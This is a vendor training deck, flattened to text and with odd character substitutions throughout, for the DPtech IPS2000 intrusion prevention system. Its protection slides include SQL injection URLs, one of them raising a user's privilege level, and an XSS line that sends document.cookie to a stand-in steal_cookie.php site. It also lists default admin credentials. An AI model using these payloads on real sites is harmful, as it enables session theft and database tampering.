DPtechIPS2000系列入侵防御系统培训胶片ppt课件

1、DPtech IPS2000入侵防御系统1目 录产品引见技术特点组网方式平安趋势典型配置运维管理.2根据国家计算机网络应急技术处置协调中心简称CNCERT/CC报告，网络平安事件依然继续不断迸发。平安事件不断迸发2021 年CNCERT 共接纳21927 件网络平安事件报告.3趋势一：网络无边境边境在哪里？VPN、挪动办公、无线网络等运用日渐增多，网络边境日益模糊，以防火墙为代表的传统边境平安防护手段无能为力.4趋势二：新业务方式层出不穷WEB2.0云计算P2P运用网上支付.5趋势三：平安破绽不断迸发Zero Day Attack！网络设备、操作系统、数据库软件、运用软件破绽数不胜数微软操作系

2、统视频功能组件高危破绽微软Office 组件高危破绽微软IE 阅读器0day 破绽域名系统软件Bind 9 高危破绽.6趋势四：平安要挟多样化运用层平安要挟蠕虫/病毒DoS/DDoS间谍软件网络钓鱼带宽滥用渣滓邮件.7趋势五：利益驱动下的信息犯罪越来越多信息平安事件是以经济利益为驱动病毒、木马、攻击已构成产业链.8目 录平安趋势技术特点组网方式产品引见典型配置运维管理.9DPtech IPS2000产品系列百兆级千兆级万兆级IPS2000-MC-NIPS2000-TS-NIPS2000-MA-NIPS2000-GS-NIPS2000-GE-NIPS2000-MS-NIPS2000-ME-NIP

3、S2000-GA-N迪普科技拥有从百兆至万兆的全系列入侵防御系统，可覆盖中小型企业、大型企业以及运营商的各种运用层平安防护需求。.10DPtech IPS2000产品系列IPS2000-MC/MS/MA-NIPS2000-MEN千兆光口千兆电口管理口串口.11DPtech IPS2000产品系列IPS2000-GS/GA-NIPS2000-GE-N.12DPtech IPS2000产品系列IPS2000-TS-N.13DPtech IPS2000产品系列型号IPS2000-TS-NIPS2000-GE-NIPS 2000-GA-NIPS 2000-GS-N IPS 2000ME-N IPS 2

4、000-MA -N吞吐量12Gbps6Gbps3Gbps1.5Gbps800Mbps300Mbps并发会话数400W400W100W100W100W20W新建会话数20W/S20W/S4W/S2W/S2W/S1W/S高度2U2U1U1U1U1U接口2个管理口(千兆自适应、电口)12个千兆自适用电口(内置3组掉电保护)12个千兆自适应光口，2个万兆光口，1个RJ45串口,1 个USB口 2个管理口(千兆自适应、电口)6个千兆自适应电口(内置3组掉电保护)6 个千兆自适应光口2GE光口，6GE电口，一个插槽，2个GE管理口2个管理口(千兆自适应、电口)6个千兆自适应电口.14DPtech系列产品硬

5、件架构多核CPU硬件架构提高CPU处置才干，多核并发处置网络流量，提高设备处置性能内置FPGA硬件以及硬件逻辑检测引擎经过FPGA的硬件检测引擎，极大的提高设备性能以及设备的竞争力.DPtech系列产品硬件架构内置高速网络转发和处置芯片网络接口密度高、数量多、接口类型丰富，可以满足各种部署和组网需求掉电维护模块保证在异常断电等各种突发环境下的网络可用性，从而保证设备的可靠性15.DPtech系列产品软件架构16网络操作系统平台 自主研发的高性能网络操作系统平台，支撑各种不同的网络产品，同时保证一样产品的各种款型系列资源整合深度流检测引擎算法的性能与特征多少无关，检测引擎只需对报文内容检测一次，

6、即能满足多种检测需求，如协议特征、病毒特征、IPS特征、url特征等各种特征发掘，大大提高多复杂并发业务的检测性能.DPtech系列产品软件架构17Web运用防护引擎 对HTTP报文进展细致分析,完成协议切分、进展解码处置、进展负载处置以及进展语法和语义分析，防护多种Web攻击DDos检测引擎 基于报文内容和统计学原理，准确识别各种DDos攻击.18目 录平安趋势产品引见组网方式技术特点典型配置运维管理.19超强性能多核CPU+大容量FPGA，实现不同会话的并行处置硬件网络加速单元NA按照不同的报文内容，将不同的会话分发到不同的CPU进展处置，同时实现CPU间平衡负载分担深度流检测引擎只进展一

7、次匹配，输出检测结果供后续战略模块运用.20超强性能10GE 通道10GE 通道FPGACPU交换芯片转发报文.21超强性能深度流检测引擎Web防护引擎DDos引擎FPGA协议分析引擎其他业务CPU10GE 通道转发交换芯片10GE 通道报文.22IPS攻击防护破绽都是由于运用系统的错误导致的，针对不同的防护对象可以开启不同的防护战略IPS具备全面的攻击防护功能Web平安缓冲区溢出破绽操作系统破绽恶意代码协议异常功能 .23IPS攻击防护-Web平安-SQL注入原理利用程序中的破绽，构造特殊的SQL语句并提交以获取敏感信息危害获取系统控制权未经授权情况下操作数据库的数据恶意篡改网页内容私自添加

8、系统帐号或数据库运用者帐号 .24IPS攻击防护-Web平安-SQL注入案例1某论坛用户登录的页面代码如下：$sql = SELECT * FROM user WHERE username = $username AND pwd = $password; $result = mysql_query($sql) ; IE中正常的URL如下：a.b.c.d/user.php?username=dptech&pwd=dptechSQL语句为：SELECT * FROM user WHERE username = dptech AND pwd = dptech .25IPS攻击防护-Web平安-SQL

9、注入案例1构造如下的URL：a.b.c.d/user.php?username=dptech/*实践插入的SQL语句变为：SELECT * FROM user WHERE username = dptech/* AND pwd = .26IPS攻击防护-Web平安-SQL注入案例2某论坛用户修正密码的页面代码如下：$sql = UPDATE $tblname SET pwd = $password WHERE username = $username;$result = mysql_query($sql) ;IE中正常的URL如下：a.b.c.d/changepwd.php?username=

10、dptech&pwd=dptechSQL语句为：UPDATE user SET pwd = dptech WHERE username = dptech.27IPS攻击防护-Web平安-SQL注入案例2实践插入的SQL语句变为：UPDATE user SET pwd = abcd,level=3 WHERE username = dptech构造如下的URL：a.b.c.d/changepwd.php?username=dptech&pwd=abcd ,level=3.28IPS攻击防护-Web平安-SQL注入防备1.经过分析SQL语法和语义，进展准确识别2.只在GET音讯的URL部分和POS

11、T音讯的负载部分检测，减少误报3.针对知名SQL注入工具进展特征提取(穿山甲、HDSL)4.支持主流数据库的注入攻击(SQL Server/Mysql/Oracle)5.支持SQL注入探测(and攻击/or攻击/数据库类型查询攻击/表名查询攻击等) 6. 支持SQL注入攻击(结合查询攻击/数据更新攻击/数据删除攻击/经过数据库执行系统命令攻击) .29IPS攻击防护-Web平安-XSS原理网站对输入过滤不严厉攻击者往Web页面的html代码中插入恶意的数据，用户以为该页面是可信任的，当用户阅读该页之时，嵌入Web页里的恶意代码/脚本会被执行危害存在破绽的是网站，被攻击的是阅读该网站的用户 .3

12、0IPS攻击防护-Web平安-XSS案例假设某BBS网站可以发贴1、攻击者在发贴区域发布脚本，其中包含恶意代码，例如重定向到某个恶意网站document.localiton=mysite/steal_cookie.php?%2Bdocument.cookie 2、阅读者正常阅读该页面，正常情况下应该看到发布的内容，但效力器在传给客户端的HTML页面中包含了这段代码，导致用户的页面被重定向到恶意网站3、恶意网站可以搜集访问它的用户的个人信息.31IPS攻击防护-Web平安-XSS防护1.经过分析XSS的语义，进展准确识别2.只在GET音讯的URL部分和POST音讯的负载部分检测，减少误报3.针对

13、各种XSS攻击探测进展识别(alert攻击/script攻击/iframe攻击) 4.支持多个Web运用程序攻击( phpCommunityCalendar/ Tikiwiki/PHPBB等跨站脚本攻击) .32IPS攻击防护-Web平安-其他LDAP注入目录穿越命令注入PHP文件包含.33IPS攻击防护-缓冲区溢出原理栈溢出堆溢出危害获取系统控制权 .34IPS攻击防护-缓冲区溢出-MS08-067MS08-067:效力器效力中的破绽能够允许远程执行代码 破绽缘由：Windows系统在处置特定格式的RPC恳求时，在解析其中目录格式的时候存在缓冲区溢出破绽，远程攻击者可以经过这个破绽实现对系统

14、的完全控制攻击报文：.35IPS攻击防护-缓冲区溢出防备IE/FireFox/Netsacape等各种阅读器溢出破绽(MS06-055/MS07-069/MS08-010/MS09-057/MS10-002等IE溢出破绽) 各种客户端运用程序溢出破绽(QQ软件/迅雷下载软件/暴风影音/中国游戏中心/微软OfiiceWord Excel等办公软件) 各种网络设备溢出破绽(Cisco IOS/Cisco ACS/ D-Link路由器) Web效力器溢出破绽(IIS/Apache) .36IPS攻击防护-操作系统破绽原理操作系统对外提供网络效力存在溢出破绽危害获取系统控制权.37IPS攻击防护-操作

15、系统破绽防备Windows操作系统(包括MS05-039/MS05-047/MS080-067/MS09-001等最近几年微软发布的操作系统平安破绽) Unix类操作系统破绽(包括Unix/Linux/FreeBSD) 3. Novell操作系统破绽(包括 edirectory/ Novell Distributed Print Services等操作系统平安破绽) 4. Solaris操作系统破绽(主要为Solaris系统提供的各种网络效力破绽) .38IPS攻击防护-恶意代码蠕虫攻击( Beagle.AA/尼姆达/飞客蠕虫/ Nachi.B等) 木马攻击(冰河/任我行/广外男生/NetSk

16、y/ bersek等) 钓鱼攻击(中国银行/工商银行/农业银行等) 间谍软件攻击( Adware hxdl/ Hijacker starware toolbar/ Keylogger keylogger pro/ Adware web-nexus等) .39IPS攻击防护-协议异常多媒体协议异常攻击(SIP/H.323)邮件协议异常攻击(SMTP/POP3)FTP协议异常攻击 .40病毒防护从越来越多的病毒经过网络进展传播，到绝大部分病毒都是经过网络进展传播内嵌卡巴斯基病毒库并继续更新，准确识别市面上传播的病毒经过深度流检测引擎，能快速识别此流量能否带有病毒。结合协议分析引擎，可以准确查杀承载

17、在HTTP、FTP、TFTP、邮件等多种运用之上的病毒.41URL过滤URL分类库，支持1000万条的级别，对url进展分类管理，如对成人暴力类url进展过滤自定义URL分类，支持用户援用自定义url分类高级URL过滤，用户可灵敏配置定义url，如经过配置IP和主机名，也可经过配置url特征(正那么表达式)实现恣意url的深度识别.42Dos/DDosDDoS 攻击FLOOD攻击：SYN、SYN-ACK、UDP、ICMP、DHCP等DNS攻击：DNS Reply、DNS Request、DNS Domain固定域名/热点域名等DDoS 防护阈值防护代理防护反弹防护会话形状检测防护等 DPtec

18、h IPSDos/DDos防护原理.43带宽管理经过特征库分析，识别800+种以上运用采用智能令牌桶技术，进展准确限速对每IP按照网络运用进展限速按照接口以及按照网络运用进展限速对关键运用可以进展带宽保证对非法运用进展阻断.44目 录平安趋势产品引见技术特点组网方式典型配置运维管理.45路由器交换机DPtech IPS内部网络路由器交换机DPtech IPS镜像IPS在线部署方式部署于网络的关键途径上，对流经的数据流进展2-7层深度分析，实时防御外部和内部攻击。IDS旁路部署方式对网络流量进展监测与分析，记录攻击事件并告警。IPS典型组网内部网络.46断电维护设备-PFP.47IPS正常时，流

19、量情况： IN-1-2-A-B-3-4-OUTIPS异常时，流量情况： IN-1-4-OUT断电维护设备-PFP.48目 录平安趋势产品引见技术特点典型配置组网方式运维管理.49登陆IPS的Web页面PC直连设备管理口，缺省IP地址为；用户名：admin，密码：admin .50下发IPS战略在【IPS规那么】中创建规那么后，援用到【IPS战略】中的指定接口.51IPS日志输出到UMC在【日志管理】-【业务日志】中，开启将IPS日志输出UMC功能IP：UMC安装效力器的IP地址，PORT：9514.52登陆UMC的Web页面在效力器安装UMC后，用IE访问其网卡IP地址注：UMC地址需与IPS

20、管理地址互通，用户名：admin，密码：UMCAdministrator .53添加IPS设备在【设备管理】-【设备列表】中，添加IPS设备.54UMC与IPS时间同步在【系统管理】-【时间同步配置】中，点击“立刻同步注：UMC与IPS时间不一致，会影响日志统计.55查看日志情况在【网络监控】中查看流量分析日志，在【攻击监控】中查看IPS日志假设未运用UMC，那么在IPS设备【IPS日志】中查看.56目 录平安趋势产品引见技术特点运维管理组网方式典型配置.57IE运用6.0或更高版本，初次登陆请清空IE缓存管理口缺省IP地址为 缺省用户名是admin，密码是admin设备支持管理员运用HTTP

21、/HTTPS协议登陆web管理界面的总数最多为5个预备任务.58Console口配置管理地址配置管理口地址不同设备型号管理口称号不同Console口初始密码为DPTECH.59软件版本晋级经过WEB页面导入软件版本，并指定为下次启动版本，重启后自动加载指定版本，完成软件版本晋级.60FAQ为什么管理口配了IP地址，PC却Ping不通？在同网段中，需同属一网段；在不同网段中，需在IPS设备上添加相应的路由。 在WEB界面上直接对管理口的IP设置修正，会有什么结果？会导致当前WEB界面无法访问，需求重新访问修正后的IP地址。 .61FAQ当设备异常断电时，之前在WEB界面上的配置能否保管？ 保管，设备开启情况下，对于操作与配置都是实时保管的。 设备上的USB接口做什么用的？ 外置断电维护PFP，以及3G扩展。 我有特征库